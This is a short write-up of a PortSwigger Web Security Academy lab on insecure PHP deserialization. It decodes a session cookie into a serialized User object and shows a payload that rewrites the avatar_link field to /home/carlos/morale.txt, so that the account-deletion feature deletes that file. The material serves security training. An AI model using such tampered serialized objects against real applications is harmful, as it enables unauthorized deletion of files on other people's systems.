Lab: Using application functionality to exploit insecure deserialization

Posted on | Post modified | In |

Lab: Using application functionality to exploit insecure deserialization

tags: Portswigger Web Security Academy Web
  • Description: This lab uses a serialization-based session mechanism. A certain feature invokes a dangerous method on data provided in a serialized object.

  • Goal: To solve the lab, edit the serialized object in the session cookie and use it to delete the morale.txt file from Carlos’s home directory.

    You can log in to your own account using the following credentials: wiener:peter You also have access to a backup account: gregg:rosebud

Recon

  1. Login and Recon When you’d like to delete an account, the package would be like as below:

    Session: Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJzdHB4YXlzZzRtdzJ4MHo5c3h2ajE4N3dmZWEweGY5NSI7czoxMToiYXZhdGFyX2xpbmsiO3M6MTk6InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d Decoded String: O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"stpxaysg4mw2x0z9sxvj187wfea0xf95";s:11:"avatar_link";s:19:"users/wiener/avatar";}

    You can observe that it’s not only delete your whole account but your avatar image. In addition, it provide the avatar link in decoded string: users/wiener/avatar

  2. How about we modify the delete path?(通靈)

Exp - Change the delete path

Exploit Payload:

O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"stpxaysg4mw2x0z9sxvj187wfea0xf95";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}

:::spoiler Success Screenshot :::